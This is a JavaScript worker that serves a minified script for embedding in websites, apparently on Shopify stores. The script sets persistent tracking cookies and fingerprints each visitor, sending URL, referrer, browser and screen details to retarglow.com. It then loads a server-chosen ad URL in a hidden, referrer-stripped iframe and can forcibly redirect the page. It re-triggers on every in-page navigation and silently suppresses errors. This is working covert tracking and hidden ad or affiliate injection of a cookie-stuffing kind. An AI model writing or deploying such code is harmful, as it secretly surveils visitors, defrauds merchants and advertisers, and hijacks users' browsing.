export default {
  async fetch(request) {
    const u = new URL(request.url), cid = u.searchParams.get("cid") || "default";
    const headers = {
      "Content-Type": "application/javascript",
      "Access-Control-Allow-Origin": "*",
      "Cache-Control": "public, max-age=600"
    };
    const js = `(function(){try{const c="${cid}",_r=localStorage.getItem("_r")||crypto.randomUUID();localStorage.setItem("_r",_r);document.cookie="_r="+_r+";path=/;max-age=2592000;SameSite=Lax";document.cookie="smc_uid="+_r+";path=/;max-age=31536000;SameSite=Lax";document.cookie="user_id_t="+_r+";path=/;max-age=31536000;SameSite=Lax";let vc=1;try{const m=document.cookie.match(/(?:^|;\\s*)visit_ct=(\\d+)/);vc=m?parseInt(m[1])+1:1}catch{}document.cookie="visit_ct="+vc+";path=/;max-age=31536000;SameSite=Lax";document.cookie="page_refreshed=true;path=/;max-age=86400;SameSite=Lax";const S=!!document.querySelector('script[src*="cdn.shopify.com"], link[href*="cdn.shopify.com"]'),u=location.href,r=document.referrer,n=navigator.userAgent,b=n.includes("Chrome")?"C":n.includes("Firefox")?"F":n.includes("Safari")?"S":"U",d=/Mobi|Android/i.test(n)?"M":"D",o=navigator.platform,s=screen.width+"x"+screen.height,domain=location.hostname,p={cid:c,u,r,ua:n,dt:d,b,os:o,sr:s,cm:{_r},domain,visit_ct:vc,page_refreshed:!0,shopify:S};fetch("https://retarglow.com/log",{method:"POST",headers:{"Content-Type":"application/json"},body:JSON.stringify(p)});let g=!1,li=0;const sk="i_"+_r+"_"+location.pathname,once=sessionStorage.getItem(sk),inj=()=>{const now=Date.now();if(g||once||now-li<1e3)return;g=!0;li=now;sessionStorage.setItem(sk,"1");fetch("https://retarglow.com/serve",{method:"POST",headers:{"Content-Type":"application/json"},body:JSON.stringify({u,cm:{_r},cid:c})}).then(x=>x.json()).then(j=>{if(!j.ad_url)return;const f=document.createElement("iframe");f.style.display="none",f.referrerPolicy="no-referrer",f.src=j.ad_url.replace("{{_r}}",encodeURIComponent(_r)),f.onerror=()=>{const img=new Image;img.src=j.ad_url,setTimeout(()=>{window.location.href=j.ad_url},300)},document.body.appendChild(f)})};setTimeout(inj,2e3),window.addEventListener("scroll",()=>{inj(),window.removeEventListener("scroll",inj)}),setTimeout(inj,5e3),["pushState","replaceState"].forEach(fn=>{const h=history[fn];history[fn]=function(){const R=h.apply(this,arguments);g=!1,sessionStorage.removeItem(sk),setTimeout(inj,1500);return R}}),window.addEventListener("popstate",()=>{g=!1,sessionStorage.removeItem(sk),setTimeout(inj,1500)});let L=location.href;new MutationObserver(()=>{if(location.href!==L){L=location.href,g=!1,sessionStorage.removeItem(sk),setTimeout(inj,1500)}}).observe(document,{childList:!0,subtree:!0})}catch(e){}})();`;
    return new Response(js, { status: 200, headers });
  }
};
